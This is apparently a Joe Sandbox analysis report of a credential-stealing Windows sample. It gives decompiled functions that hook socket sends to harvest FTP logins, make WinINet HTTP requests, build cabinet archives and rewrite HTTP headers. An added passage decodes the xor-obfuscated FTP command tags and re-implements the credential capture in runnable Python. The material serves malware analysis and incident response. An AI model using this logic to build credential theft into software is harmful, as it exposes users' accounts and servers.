606->574 606->605 611 40b799-40b7a1 call 410418 607->611 612 40b78b-40b797 call 40b635 607->612 608->607 618 40b779-40b77f call 410418 608->618 609->584 610->609 623 40b898-40b89d 610->623 624 40b7a4-40b7a7 611->624 612->624 628 40b7a9-40b7ba LeaveCriticalSection 618->628 626 40b8c3-40b903 call 4136dd call 40f369 call 40d965 623->626 627 40b89f-40b8a4 623->627 624->628 626->609 627->609 629 40b8a6-40b8c1 call 40f369 call 411145 627->629 628->562 629->609 629->626
            C-Code - Quality: 87%
            			E0040B6A0(void* __eax, signed int* __ecx, intOrPtr _a4) {
            				char _v536;
            				char _v652;
            				char _v664;
            				char _v696;
            				char _v700;
            				char _v701;
            				char _v708;
            				signed int _v713;
            				void* __edi;
            				void* __esi;
            				char* _t40;
            				char* _t49;
            				intOrPtr _t50;
            				void* _t60;
            				intOrPtr _t63;
            				signed int _t64;
            				signed int _t66;
            				void* _t67;
            				intOrPtr _t78;
            				intOrPtr _t79;
            				intOrPtr _t80;
            				signed int* _t83;
            				void* _t84;
            				intOrPtr _t85;
            				signed int* _t87;
            				signed int _t90;
            				void* _t91;
            				void* _t93;
            				void* _t99;
            				intOrPtr* _t100;
            
            				_t93 = __eax;
            				_t87 = __ecx;
            				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
            					L51:
            					_t40 = 0;
            					__eflags = 0;
            				} else {
            					if(__eax <= 6) {
            						L24:
            						__eflags = _t93 - 1;
            						if(_t93 <= 1) {
            							goto L51;
            						} else {
            							EnterCriticalSection(0x41aa1c);
            							_t78 = E0040B594(_a4);
            							__eflags = _t78;
            							if(_t78 != 0) {
            								__eflags =  *((intOrPtr*)(_t78 + 4));
            								if( *((intOrPtr*)(_t78 + 4)) == 0) {
            									L48:
            									_push(0);
            									goto L49;
            								} else {
            									__eflags =  *((intOrPtr*)(_t78 + 8));
            									if( *((intOrPtr*)(_t78 + 8)) == 0) {
            										goto L48;
            									} else {
            										__eflags = _t93 - 3;
            										if(_t93 < 3) {
            											L33:
            											__eflags = _t93 - 4;
            											if(_t93 >= 4) {
            												_t90 =  *_t87 ^ 0x02000800;
            												__eflags = _t90 - 0x47505154;
            												if(_t90 == 0x47505154) {
            													goto L37;
            												} else {
            													__eflags = _t90 - 0x56414d46;
            													if(_t90 == 0x56414d46) {
            														goto L37;
            													} else {
            														__eflags = _t90 - 0x54534950;
            														if(_t90 != 0x54534950) {
            															__eflags = _t90 - 0x56415c53;
            															if(_t90 == 0x56415c53) {
            																L40:
            																_push(2);
            																_v701 = 0x65;
            																_pop(1);
            																goto L41;
            															} else {
            																__eflags = _t90 - 0x5653414c;
            																if(_t90 == 0x5653414c) {
            																	goto L40;
            																}
            															}
            														} else {
            															goto L37;
            														}
            													}
            												}
            											}
            										} else {
            											_t64 =  *_t87;
            											__eflags = _t64 - 0x43;
            											if(_t64 == 0x43) {
            												L31:
            												__eflags = _t87[0] - 0x57;
            												if(_t87[0] != 0x57) {
            													goto L33;
            												} else {
            													__eflags = _t87[0] - 0x44;
            													if(_t87[0] == 0x44) {
            														L37:
            														_v701 = 0x64;
            														L41:
            														E0040F369(1,  &_v696);
            														_t49 =  &_v652;
            														_v700 = 0x80;
            														__imp__#5(_a4, _t49,  &_v700);
            														__eflags = _t49;
            														if(_t49 == 0) {
            															_t82 =  &_v664;
            															_t50 = E00413726( &_v664);
            															__eflags = _t50;
            															if(_t50 == 0) {
            																__eflags = _v713 - 0x65;
            																if(_v713 == 0x65) {
            																	L46:
            																	E004136DD( &_v664, _t82,  &_v536);
            																	__eflags = 0;
            																	E0040F369(0,  &_v696);
            																	_push( &_v536);
            																	_push( *((intOrPtr*)(_t78 + 8)));
            																	_push( *((intOrPtr*)(_t78 + 4)));
            																	E0040D965(_t82, _t84, __eflags, _v713 & 0x000000ff, 0, 0,  &_v696,  &_v708);
            																} else {
            																	__eflags = _v713 - 0x64;
            																	if(_v713 == 0x64) {
            																		_t60 = 3;
            																		E0040F369(_t60,  &_v696);
            																		_t82 =  *((intOrPtr*)(_t78 + 4));
            																		_t91 = 9;
            																		_t63 = E00411145( &_v696,  *((intOrPtr*)(_t78 + 4)), _t91);
            																		__eflags = _t63;
            																		if(_t63 != 0) {
            																			goto L46;
            																		}
            																	}
            																}
            															}
            														}
            														_push(0);
            														L49:
            														E0040B635(_t78);
            													} else {
            														goto L33;
            													}
            												}
            											} else {
            												__eflags = _t64 - 0x50;
            												if(_t64 != 0x50) {
            													goto L33;
            												} else {
            													goto L31;
            												}
            											}
            										}
            									}
            								}
            							}
            							_t79 = 0;
            							goto L23;
            						}
            					} else {
            						_t66 =  *__ecx ^ 0x02000800;
            						if(_t66 == 0x50455b55 || _t66 == 0x51534950) {
            							if(_t87[1] != 0x20) {
            								goto L24;
            							} else {
            								_t99 = _t93 + 0xfffffffb;
            								_t67 = 0;
            								_t83 =  &(_t87[1]);
            								if(_t99 <= 0) {
            									goto L51;
            								} else {
            									while(1) {
            										_t85 =  *((intOrPtr*)(_t67 + _t83));
            										if(_t85 == 0xd || _t85 == 0xa) {
            											break;
            										}
            										if(_t85 < 0x20) {
            											goto L51;
            										} else {
            											_t67 = _t67 + 1;
            											if(_t67 < _t99) {
            												continue;
            											} else {
            												break;
            											}
            										}
            										goto L52;
            									}
            									if(_t67 == 0 || _t67 == _t99) {
            										goto L51;
            									} else {
            										_t80 = E0041065D(_t67, 0xfde9, _t83);
            										if(_t80 == 0) {
            											goto L51;
            										} else {
            											_v701 = 0;
            											EnterCriticalSection(0x41aa1c);
            											_t100 = E0040B594(_a4);
            											if(_t100 != 0) {
            												L18:
            												__eflags =  *_t87 - 0x55;
            												_v701 = 1;
            												if( *_t87 != 0x55) {
            													E00410418( *((intOrPtr*)(_t100 + 8)));
            													 *((intOrPtr*)(_t100 + 8)) = _t80;
            												} else {
            													E0040B635(_t100, 1);
            													 *((intOrPtr*)(_t100 + 4)) = _t80;
            												}
            												 *_t100 = _a4;
            											} else {
            												_t100 = E0040B5CD(_a4);
            												if(_t100 != 0) {
            													goto L18;
            												} else {
            													E00410418(_t80);
            												}
            											}
            											_t79 = _v701;
            											L23:
            											LeaveCriticalSection(0x41aa1c);
            											_t40 = _t79;
            										}
            									}
            								}
            							}
            						} else {
            							goto L24;
            						}
            					}
            				}
            				L52:
            				return _t40;
            			}

            • Instruction address range: 0x0040b6b3 to 0x0040b921

            APIs
            • EnterCriticalSection.KERNEL32(0041AA1C,0000FDE9,?), ref: 0040B757
            • LeaveCriticalSection.KERNEL32(0041AA1C,?,000000FF), ref: 0040B7B2
            • EnterCriticalSection.KERNEL32(0041AA1C), ref: 0040B7CD
            • getpeername.WS2_32 ref: 0040B881
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$Enter$Leavegetpeername
            • String ID: FMAV$LASV$PISQ$PIST$S\AV$TQPG$U[EP$d$e
            • API String ID: 1099368488-1876342263
            • Opcode ID: 03cf219e80323a5e29ab8fa68eeac4349245ddf795d9476fef257a3b88686f62
            • Instruction ID: 1a5596c8ea5751bace2b092f6d630db204c77c5fc4164940623e21ba233326d1
            • Opcode Fuzzy Hash: 03cf219e80323a5e29ab8fa68eeac4349245ddf795d9476fef257a3b88686f62
            • Instruction Fuzzy Hash: 645133729043419ADB31AA64C8847AB7B95DF81704F04893BEA94B73E1C33CCD8597DE
            Uniqueness

            Uniqueness Score: -1.00%
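The constants in E0040B6A0 above tell what the function is for. The first dword of the buffer is xored with 0x02000800 and compared with the seven values the report lists under "String ID" (U[EP, PISQ, TQPG, FMAV, PIST, S\AV, LASV); undoing that xor yields the FTP commands USER, PASS, TYPE, FEAT, PASV, STAT and LIST. A USER or PASS line followed by a space is scanned for its CR/LF terminator, rejected if it contains any other control byte, converted with code page 0xfde9 (CP_UTF8), and stored in a per-socket entry (E0040B594 looks the entry up, E0040B5CD creates it, both under the critical section at 0x41aa1c). On the next post-login command the function calls getpeername (WS2_32 ordinal 5) on the socket and hands the username, password and server address to E0040D965. Plaintext FTP logins sent from an infected host are therefore harvested together with the server they belong to. The Python below is an added illustration, not code from the sample or from Joe Sandbox: it decodes the tags and re-expresses the state machine so it can be run over a constructed session. Assumptions are marked in the code: the space check and the CWD/PWD comparison are read as byte compares (the decompiler shows them as dword compares against the same pointer), E0040B635 is treated as "discard the entry", the extra check E00411145 applies to the 'd' group before reporting is not modelled, and getpeername is replaced by a caller-supplied callback.

```python
"""FTP credential capture, re-expressed from the decompiled E0040B6A0.

Added illustration, not code from the sample or from Joe Sandbox.
"""

XOR_KEY = 0x02000800

# The seven dwords the decompiled function compares against (buffer_dword ^ XOR_KEY).
OBFUSCATED_TAGS = (0x50455B55, 0x51534950, 0x47505154, 0x56414D46,
                   0x54534950, 0x56415C53, 0x5653414C)


def decode_tag(obfuscated: int) -> str:
    """Undo the xor and read the dword as a little-endian 4-byte ASCII command."""
    return ((obfuscated ^ XOR_KEY) & 0xFFFFFFFF).to_bytes(4, "little").decode("ascii")


def encode_tag(command: str) -> int:
    """Inverse of decode_tag: the value the sample stores for a 4-byte command."""
    return int.from_bytes(command.encode("ascii"), "little") ^ XOR_KEY


class FtpCredentialGrabber:
    """Per-socket USER/PASS collector that reports on the next post-login command."""

    MAX_LEN = 0x200
    GROUP_D = {encode_tag(c) for c in ("TYPE", "FEAT", "PASV")}  # marker 'd' in the sample
    GROUP_E = {encode_tag(c) for c in ("STAT", "LIST")}          # marker 'e' in the sample

    def __init__(self, peer_lookup):
        # peer_lookup(socket) -> (ip, port) stands in for getpeername(); assumption.
        self._peer_lookup = peer_lookup
        self._entries = {}  # socket -> {"user": str | None, "pass": str | None}
        self.reports = []

    def on_send(self, sock: int, data: bytes) -> bool:
        """Model of E0040B6A0(len, buf, socket): True iff a USER/PASS line was stored."""
        n = len(data)
        if sock == -1 or n == 0 or n > self.MAX_LEN:
            return False
        if n > 6:
            tag = int.from_bytes(data[:4], "little") ^ XOR_KEY
            # data[4] == ' ' read as a byte compare (assumption; decompiler shows a dword).
            if tag in (encode_tag("USER"), encode_tag("PASS")) and data[4] == 0x20:
                return self._store_credential(sock, data)
        if n > 1:
            self._report_if_complete(sock, data)
        return False

    def _store_credential(self, sock: int, data: bytes) -> bool:
        body = data[5:]
        i = 0
        while i < len(body):
            ch = body[i]
            if ch in (0x0D, 0x0A):
                break
            if ch < 0x20:  # any other control byte rejects the whole line
                return False
            i += 1
        if i == 0 or i == len(body):  # empty value, or no CR/LF terminator
            return False
        try:
            value = body[:i].decode("utf-8")  # MultiByteToWideChar(CP_UTF8 == 0xfde9)
        except UnicodeDecodeError:
            return False
        entry = self._entries.setdefault(sock, {"user": None, "pass": None})
        if data[0] == ord("U"):
            entry["user"], entry["pass"] = value, None  # new login attempt resets the pair
        else:
            entry["pass"] = value
        return True

    def _report_if_complete(self, sock: int, data: bytes) -> None:
        entry = self._entries.get(sock)
        if entry is None:
            return
        if entry["user"] is None or entry["pass"] is None:
            del self._entries[sock]  # decompiled label L48: incomplete entry is discarded (assumption)
            return
        n = len(data)
        group = None
        if n >= 3 and data[0] in (ord("C"), ord("P")) and data[1:3] == b"WD":
            group = "d"  # CWD / PWD; the byte offsets are an assumption
        elif n >= 4:
            tag = int.from_bytes(data[:4], "little") ^ XOR_KEY
            if tag in self.GROUP_D:
                group = "d"
            elif tag in self.GROUP_E:
                group = "e"
        if group is None:
            return  # unrecognised command: the entry is kept for later
        ip, port = self._peer_lookup(sock)
        self.reports.append({"user": entry["user"], "password": entry["pass"],
                             "server": f"{ip}:{port}", "group": group,
                             "trigger": data[:4].rstrip(b" \r\n").decode("ascii", "replace")})
        del self._entries[sock]  # E0040B635(entry, 0) after reporting (assumption)


def demo():
    """Constructed client-to-server FTP session run through the model."""
    grabber = FtpCredentialGrabber(lambda sock: ("203.0.113.7", 21))  # constructed peer
    session = [b"USER alice\r\n", b"PASS Tr0ub4dor\r\n", b"TYPE I\r\n", b"LIST\r\n"]
    for line in session:
        grabber.on_send(7, line)
    return grabber.reports
```

The model returns 1 (True) for a stored USER or PASS line and 0 otherwise, as the decompiled function does; what the hooked caller does with that result is outside this excerpt. For response, the practical consequence is that any FTP account used in clear text from the infected host should be treated as exposed along with the server address it was used against.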

            Control-flow Graph

            C-Code - Quality: 100%
            			E004077CB(intOrPtr* _a4) {
            				char _v532;
            				void* _v536;
            				short _v540;
            				char* _v552;
            				void* _v568;
            				char _v570;
            				char _v572;
            				char _v576;
            				char* _v580;
            				void* _v592;
            				char _v596;
            				char _v600;
            				void* _v620;
            				void* _v624;
            				void* _v628;
            				char* _v632;
            				long _v648;
            				void _v652;
            				intOrPtr _v656;
            				char _v668;
            				intOrPtr _v672;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t53;
            				void* _t56;
            				intOrPtr _t58;
            				void* _t63;
            				void* _t67;
            				signed int _t69;
            				void* _t95;
            				void* _t100;
            				char* _t102;
            				intOrPtr* _t110;
            				void* _t114;
            				intOrPtr* _t115;
            				signed int _t121;
            				void* _t123;
            
            				_t123 = (_t121 & 0xfffffff8) - 0x224;
            				_t110 = _a4;
            				if(E00414FF4( &_v532,  *((intOrPtr*)(_t110 + 4))) == 0) {
            					L26:
            					return 0;
            				}
            				_t53 = InternetOpenA( *0x41a508, 0, 0, 0, 0);
            				_v536 = _t53;
            				if(_t53 == 0) {
            					L25:
            					E00410418(_v552);
            					E00410418(_v552);
            					goto L26;
            				}
            				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
            				_v592 = _t56;
            				if(_t56 == 0) {
            					L24:
            					InternetCloseHandle(_v568);
            					goto L25;
            				}
            				_t58 =  *_t110;
            				_t102 = "POST";
            				if( *((char*)(_t58 + 0x14)) != 1) {
            					_t102 = "GET";
            				}
            				_t100 = HttpOpenRequestA(_v592, _t102, _v580, "HTTP/1.1",  *(_t58 + 4), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
            				_v620 = _t100;
            				if(_t100 == 0) {
            					L23:
            					InternetCloseHandle(_v624);
            					goto L24;
            				} else {
            					E00403E7C(_t102,  &_v576);
            					_t63 = 0xb;
            					E0040F333(_t63,  &_v600);
            					_t66 =  *_a4;
            					if( *((intOrPtr*)( *_a4 + 0x1c)) > 0) {
            						_t95 = E00411233( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x18)));
            						_t123 = _t123 + 0xc;
            						if(_t95 > 0) {
            							HttpAddRequestHeadersA(_t100, _v632, 0xffffffff, 0xa0000000);
            							E00410418(_v648);
            						}
            					}
            					_t67 = 0xc;
            					E0040F333(_t67,  &_v596);
            					_t69 = E00411098( &_v572);
            					_v628 = _t69;
            					_t72 = 2 + _t69 * 6;
            					if(2 + _t69 * 6 == 0) {
            						L12:
            						_t114 = 0;
            						goto L13;
            					} else {
            						_t114 = E004103ED(_t72);
            						if(_t114 == 0) {
            							goto L12;
            						}
            						E00415327(_t114,  &_v572, _v628);
            						_t100 = _v628;
            						L13:
            						if(_t114 != 0 && E00411233( &_v632,  &_v596, _t114) > 0) {
            							HttpAddRequestHeadersA(_t100, _v632, 0xffffffff, 0xa0000000);
            							E00410418(_v648);
            						}
            						E00410418(_t114);
            						_t115 = _a4;
            						if(HttpSendRequestA(_t100, 0, 0,  *( *_t115 + 0x20),  *( *_t115 + 0x24)) != 1) {
            							L22:
            							InternetCloseHandle(_t100);
            							goto L23;
            						} else {
            							_v648 = 4;
            							_v652 = 0;
            							if(HttpQueryInfoA(_t100, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
            								goto L22;
            							} else {
            								if(E004123BD( &_v668, _t100) != 0) {
            									E00410418(_t80);
            								}
            								E00410418(_v656);
            								E00410418(_v656);
            								 *((intOrPtr*)(_t115 + 8)) = _v668;
            								goto L26;
            							}
            						}
            					}
            				}
            			}

            • Instruction address range: 0x004077d1 to 0x00407a01

            APIs
              • Part of subcall function 00414FF4: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00415023
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 004077FD
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040781E
            • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0040786D
            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004078C4
            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040793D
            • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00407960
            • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00407988
            • InternetCloseHandle.WININET(00000000), ref: 004079CD
            • InternetCloseHandle.WININET(?), ref: 004079D7
              • Part of subcall function 004123BD: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 004123D1
              • Part of subcall function 004123BD: GetLastError.KERNEL32 ref: 004123D7
              • Part of subcall function 004123BD: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 004123FB
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • InternetCloseHandle.WININET(?), ref: 004079E1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
            • String ID: GET$HTTP/1.1$POST
            • API String ID: 1023423486-2753618334
            • Opcode ID: 60ba26d390a717092d07e8262c15f17f9c64d6e31d6432aa1e6b16e4d8528128
            • Instruction ID: 204df5710b16d53696dce1ca62a07a06300b5f45112f2ec471d17f75ee7b4a69
            • Opcode Fuzzy Hash: 60ba26d390a717092d07e8262c15f17f9c64d6e31d6432aa1e6b16e4d8528128
            • Instruction Fuzzy Hash: E151D572408211ABD710AF61CD48D9F7FA9FF88354F00493EF545A21B2C738E985CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 699 413f54-413f5d 700 413f63-413f75 LoadLibraryA 699->700 701 414008-414011 699->701 702 414004-414007 700->702 703 413f7b-413fcc GetProcAddress * 4 700->703 704 413ff8-413ffe FreeLibrary 703->704 705 413fce-413fd4 703->705 704->702 705->704 706 413fd6-413fdc 705->706 706->704 707 413fde-413fe0 706->707 707->704 708 413fe2-413ff6 HeapCreate 707->708 708->701 708->704
            C-Code - Quality: 100%
            			E00413F54() {
            				struct HINSTANCE__* _t2;
            				_Unknown_base(*)()* _t7;
            				void* _t9;
            				intOrPtr _t18;
            
            				if( *0x41bc78 != 0) {
            					L9:
            					 *0x41bc78 =  *0x41bc78 + 1;
            					return 1;
            				} else {
            					_t2 = LoadLibraryA("cabinet.dll");
            					 *0x41bc74 = _t2;
            					if(_t2 == 0) {
            						L8:
            						return 0;
            					} else {
            						 *0x41bc60 = GetProcAddress(_t2, "FCICreate");
            						 *0x41bc64 = GetProcAddress( *0x41bc74, "FCIAddFile");
            						 *0x41ae98 = GetProcAddress( *0x41bc74, "FCIFlushCabinet");
            						_t7 = GetProcAddress( *0x41bc74, "FCIDestroy");
            						 *0x41bc6c = _t7;
            						if( *0x41bc60 == 0 ||  *0x41bc64 == 0) {
            							L7:
            							FreeLibrary( *0x41bc74);
            							goto L8;
            						} else {
            							_t18 =  *0x41ae98; // 0x0
            							if(_t18 == 0 || _t7 == 0) {
            								goto L7;
            							} else {
            								_t9 = HeapCreate(0, 0x80000, 0);
            								 *0x41ae94 = _t9;
            								if(_t9 != 0) {
            									goto L9;
            								} else {
            									goto L7;
            								}
            							}
            						}
            					}
            				}
            			}

            APIs
            • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041403B,?,0041425F,?,?,00000000,?,?,?), ref: 00413F68
            • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00413F88
            • GetProcAddress.KERNEL32(FCIAddFile), ref: 00413F9A
            • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00413FAC
            • GetProcAddress.KERNEL32(FCIDestroy), ref: 00413FBE
            • HeapCreate.KERNEL32(00000000,00080000,00000000,0041425F,?,?,00000000,?,?,?), ref: 00413FE9
            • FreeLibrary.KERNEL32(0041425F,?,?,00000000,?,?,?), ref: 00413FFE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$Library$CreateFreeHeapLoad
            • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
            • API String ID: 2040708800-1163896595
            • Opcode ID: 72320dcc5b6802833f6dd50d8916b7a722dfd240361883db9908659d8a9a510b
            • Instruction ID: 6ffc112349c9a2d3b368f84fe05adf98fca7b5e0abe816f96f08ca929a7c7f14
            • Opcode Fuzzy Hash: 72320dcc5b6802833f6dd50d8916b7a722dfd240361883db9908659d8a9a510b
            • Instruction Fuzzy Hash: 71115E31950710EACB225F35BD499D67EB5F389B52324823FE900A2270EF790581CBCC
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 764 40b240-40b258 call 403e2a call 403e39 769 40b2d0-40b2df 764->769 770 40b25a-40b25e 764->770 774 40b2e2-40b2e8 769->774 770->769 771 40b260-40b264 770->771 771->769 773 40b266-40b283 EnterCriticalSection call 40a2fb 771->773 777 40b285-40b292 773->777 778 40b2c9-40b2ca LeaveCriticalSection 773->778 779 40b298-40b29c 777->779 780 40b46e-40b498 LeaveCriticalSection 777->780 778->769 781 40b2a2-40b2b9 call 40a7d5 779->781 782 40b51f-40b542 LeaveCriticalSection 779->782 785 40b501-40b505 780->785 786 40b49a-40b4a9 EnterCriticalSection call 40a2fb 780->786 790 40b2e9-40b2ef 781->790 791 40b2bb-40b2c4 call 40a3b7 call 407754 781->791 782->785 792 40b544-40b553 EnterCriticalSection call 40a2fb 782->792 785->774 800 40b4c0-40b4cf 786->800 801 40b4ab-40b4be 786->801 793 40b2f5-40b305 call 406eca 790->793 794 40b50a-40b51c call 407754 790->794 791->778 804 40b555-40b568 792->804 805 40b56a-40b57c 792->805 815 40b307-40b329 call 407754 LeaveCriticalSection 793->815 816 40b32b-40b335 793->816 794->782 809 40b4d1-40b4ea call 410418 call 4104b9 800->809 810 40b4ec-40b4f2 800->810 814 40b4fa-40b4fb LeaveCriticalSection 801->814 820 40b58c-40b58f LeaveCriticalSection 804->820 812 40b587 call 40a3b7 805->812 813 40b57e-40b585 805->813 809->814 810->814 812->820 813->820 814->785 815->774 823 40b33b-40b34e call 41046b 816->823 824 40b3cf-40b3d4 816->824 820->785 835 40b350-40b35d call 4077a6 823->835 836 40b35f-40b3cb call 4077a6 call 410418 * 2 call 410882 call 415540 call 4154c4 * 2 823->836 826 40b3d6-40b3dc 824->826 827 40b43b-40b440 824->827 833 40b3e6 826->833 834 40b3de-40b3e4 826->834 827->794 831 40b446-40b46b call 407754 827->831 831->780 838 40b3ea-40b417 call 40aa77 call 410418 833->838 834->838 835->824 836->824 852 40b430-40b433 838->852 853 40b419-40b41c 838->853 852->827 856 40b435-40b436 call 410418 852->856 853->794 855 40b422-40b42e 853->855 855->827 856->827
            C-Code - Quality: 82%
            			E0040B240(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v44;
            				signed int _v60;
            				signed int _v64;
            				signed int _v68;
            				signed char _v72;
            				signed int _v76;
            				signed int _v84;
            				intOrPtr _v88;
            				signed int _v92;
            				intOrPtr _v112;
            				void* __esi;
            				signed int _t112;
            				signed int _t114;
            				signed char _t115;
            				signed int _t116;
            				void* _t118;
            				signed char _t122;
            				signed int _t123;
            				signed char _t127;
            				signed int _t130;
            				signed char _t132;
            				signed char _t138;
            				intOrPtr _t151;
            				signed char _t167;
            				void* _t173;
            				void* _t180;
            				intOrPtr _t181;
            				signed int _t187;
            				void* _t189;
            				void* _t191;
            				signed int _t205;
            				signed int _t206;
            
            				_t180 = __edx;
            				E00403E2A();
            				if(E00403E39() == 0 || _a8 == 0 || _a12 <= 0) {
            					L9:
            					_t112 =  *0x41a9e0(_a4, _a8, _a12);
            					goto L10;
            				} else {
            					EnterCriticalSection(0x41a9f0);
            					_t195 = _a4;
            					_t187 = E0040A2FB(_a4);
            					_v68 = _t187;
            					if(_t187 == 0xffffffff) {
            						L8:
            						LeaveCriticalSection(0x41a9f0);
            						goto L9;
            					}
            					_t189 = _t187 * 0x38 +  *0x41aa0c;
            					if( *(_t189 + 0x20) > 0) {
            						L29:
            						_t114 =  *(_t189 + 0x24);
            						_t191 =  *(_t189 + 0x20) - _t114;
            						LeaveCriticalSection(0x41a9f0);
            						_t198 = _a4;
            						_t115 =  *0x41a9e0(_a4,  *((intOrPtr*)(_t189 + 0x1c)) + _t114, _t191);
            						_v72 = _t115;
            						__eflags = _t115 - 0xffffffff;
            						if(_t115 != 0xffffffff) {
            							EnterCriticalSection(0x41a9f0);
            							_t116 = E0040A2FB(_t198);
            							__eflags = _t116 - 0xffffffff;
            							if(_t116 != 0xffffffff) {
            								_t167 = _v72;
            								_t118 = _t116 * 0x38 +  *0x41aa0c;
            								__eflags = _t167 - _t191;
            								if(_t167 != _t191) {
            									 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t118 + 0x24)) + _t167;
            									_t92 = _t118 + 0x28;
            									 *_t92 =  *(_t118 + 0x28) - 1;
            									__eflags =  *_t92;
            									_v72 = 1;
            								} else {
            									_t88 = _t118 + 0x1c; // -4303344
            									_v72 =  *(_t118 + 0x28);
            									E00410418( *_t88);
            									E004104B9(_t88, 0x10);
            								}
            							} else {
            								_v72 = _v72 | _t116;
            								 *0x41a9ec(0xffffe890, 8);
            							}
            							LeaveCriticalSection(0x41a9f0);
            						}
            						L36:
            						_t112 = _v72;
            						L10:
            						return _t112;
            					}
            					if( *(_t189 + 8) > 0) {
            						L38:
            						LeaveCriticalSection(0x41a9f0);
            						_t200 = _a4;
            						_t122 =  *0x41a9e0(_a4, _a8, _a12);
            						_v72 = _t122;
            						__eflags = _t122 - 0xffffffff;
            						if(_t122 != 0xffffffff) {
            							EnterCriticalSection(0x41a9f0);
            							_t123 = E0040A2FB(_t200);
            							__eflags = _t123 - 0xffffffff;
            							if(_t123 != 0xffffffff) {
            								_t173 = _t123 * 0x38 +  *0x41aa0c;
            								_t181 =  *((intOrPtr*)(_t173 + 8));
            								__eflags = _v72 - _t181;
            								if(_v72 > _t181) {
            									E0040A3B7(_t123);
            								} else {
            									 *((intOrPtr*)(_t173 + 8)) = _t181 - _v72;
            								}
            							} else {
            								_v72 = _v72 | _t123;
            								 *0x41a9ec(0xffffe890, 8);
            							}
            							LeaveCriticalSection(0x41a9f0);
            						}
            						goto L36;
            					}
            					_t176 = _a8;
            					_t127 = E0040A7D5(_a12, _a8,  &_v60, _t195);
            					_v68 = _t127;
            					if(_t127 != 0xffffffff) {
            						__eflags = _v60;
            						if(_v60 == 0) {
            							L37:
            							E00407754( &_v60);
            							_t130 = _v64 + _a12;
            							__eflags = _t130;
            							 *(_t189 + 8) = _t130;
            							goto L38;
            						}
            						_t132 = E00406ECA(_t180,  &_v60);
            						_v72 = _t132;
            						__eflags = _t132 & 0x00000001;
            						if((_t132 & 0x00000001) == 0) {
            							_v76 = 0;
            							_v72 = 0;
            							__eflags = _t132 & 0x00000002;
            							if(__eflags != 0) {
            								_t206 = E0041046B(__eflags, _a8, _a12);
            								_v84 = _t206;
            								__eflags = _t206;
            								if(_t206 != 0) {
            									E004077A6( *((intOrPtr*)(_t189 + 0x10)),  *((intOrPtr*)(_t189 + 0xc)));
            									E00410418( *(_t189 + 0x14));
            									E00410418( *((intOrPtr*)(_t189 + 4)));
            									_t151 = E00410882(_v64, _v68);
            									 *(_t189 + 0x14) =  *(_t189 + 0x14) & 0x00000000;
            									_t38 = _t189 + 0x18;
            									 *_t38 =  *(_t189 + 0x18) & 0x00000000;
            									__eflags =  *_t38;
            									 *((intOrPtr*)(_t189 + 4)) = _t151;
            									 *((intOrPtr*)(_t189 + 0xc)) = _v36;
            									 *((intOrPtr*)(_t189 + 0x10)) = _v32;
            									_v112 = E004154C4(E004154C4(E00415540(_t206, _a12, "Accept-Encoding", "identity"), _t176, _t206, "TE"), _t176, _t206, "If-Modified-Since");
            								} else {
            									E004077A6(_v16, _v20);
            								}
            							}
            							__eflags = _v68 & 0x00000004;
            							if((_v68 & 0x00000004) == 0) {
            								L27:
            								__eflags = _v76;
            								if(_v76 == 0) {
            									goto L37;
            								}
            								E00407754( &_v60);
            								_t70 = _t189 + 0x24;
            								 *_t70 =  *(_t189 + 0x24) & 0x00000000;
            								__eflags =  *_t70;
